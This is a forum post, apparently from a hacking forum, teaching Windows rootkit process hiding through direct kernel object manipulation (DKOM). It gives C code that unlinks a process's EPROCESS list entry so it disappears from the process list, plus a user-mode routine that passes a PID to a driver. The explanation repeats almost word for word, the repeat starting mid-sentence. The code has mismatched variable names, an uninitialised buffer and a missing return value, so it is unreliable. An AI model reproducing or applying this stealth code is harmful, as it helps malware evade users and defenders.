Before talking about DKOM to hide processes, it is very important that you
have some knowledge about linked lists, because the hook happens after
corruption of it.
What is the purpose of a Linked List?
Programmers may use linked lists to chain data in a certain order, and there's
two pointers: *blink (backward link pointer) and *flink (forward link pointer).
About *blink and *flink
Its purposes are simple, the *blink pointer is responsible for pointing to the item
prior to the current index of the list, and the *flink pointer is responsible for
pointing to the item after the current index of the list
So, how to corrupt a Linked List?
Since the *blink pointer points to the prior item to the current index and *flink pointer
points to the later item, if we changed the *flink of the item prior to the current index
and pointed it to the item later to the current index, and changed the *blink from
the item after the current index and set it to the item prior to the current index, we can
corrupt the order of the list and exclude the current index.
What about EPROCESS?
EPROCESS is the Windows structure that represents each process of the Windows process manager, the struct that contains the *blink and *flink of process manager.
Below its the function that corrupts the EPROCESS to hide the current index and the loader function that change EPROCESS current pointer and load DKOM.
pwn-eprocess.c
And then, the Current PID will be pulled out of EPROCESS, and will not appear in windows process manager.
Setting a PID in Current field of EPROCESS list
Before pass the PID parameter to config_eProcess, you must to convert the pid as %ld format string, like
sprintf(newpidformat, "%ld", numeric_pid);
have some knowledge about linked lists, because the hook happens after
corruption of it.
What is the purpose of a Linked List?
Programmers may use linked lists to chain data in a certain order, and there's
two pointers: *blink (backward link pointer) and *flink (forward link pointer).
About *blink and *flink
Its purposes are simple, the *blink pointer is responsible for pointing to the item
prior to the current index of the list, and the *flink pointer is responsible for
pointing to the item after the current index of the list
So, how to corrupt a Linked List?
Since the *blink pointer points to the prior item to the current index and *flink pointer
points to the later item, if we changed the *flink of the item prior to the current index
and pointed it to the item later to the current index, and changed the *blink from
the item after the current index and set it to the item prior to the current index, we can
corrupt the order of the list and exclude the current index.
What about EPROCESS?
EPROCESS is the Windows structure that represents each process of the Windows process manager, the struct that contains the *blink and *flink of process manager.
Below its the function that corrupts the EPROCESS to hide the current index and the loader function that change EPROCESS current pointer and load DKOM.
pwn-eprocess.c
Код:
void magic(PLIST_ENTRY Current) {
/* Current->Flink -> points to the next process
* Current->Blink -> points to the prior process
*
* (Current->Blink)->Flink points to the process after the previous process
* (Current->Flink)->Blink points to the process prior to the later process */
(Current->Blink)->Flink = Current->Flink;
(Current->Flink)->Blink = Current->Blink;
// Rewrite PLIST_ENTRY To avoid BSOD (black screen of death)
Current->Blink = (PLIST_ENTRY)&Current->Flink;
Current->Flink = (PLIST_ENTRY)&Current->Flink;
return;
}And then, the Current PID will be pulled out of EPROCESS, and will not appear in windows process manager.
Setting a PID in Current field of EPROCESS list
Код:
int config_eProcess(char *pid, HANDLE hDevice){
ULONG redbyt;
char *retbuf;
BOOLEAN call_return = DeviceIoControl(
hDevice,
0x815,
pid,
strlen(pid) + 1,
retbuf,
200,
&retbyt,
(LPOVERLAPPED) NULL);
if(!call_return)
return 1;
}Before pass the PID parameter to config_eProcess, you must to convert the pid as %ld format string, like
sprintf(newpidformat, "%ld", numeric_pid);
Последнее редактирование:
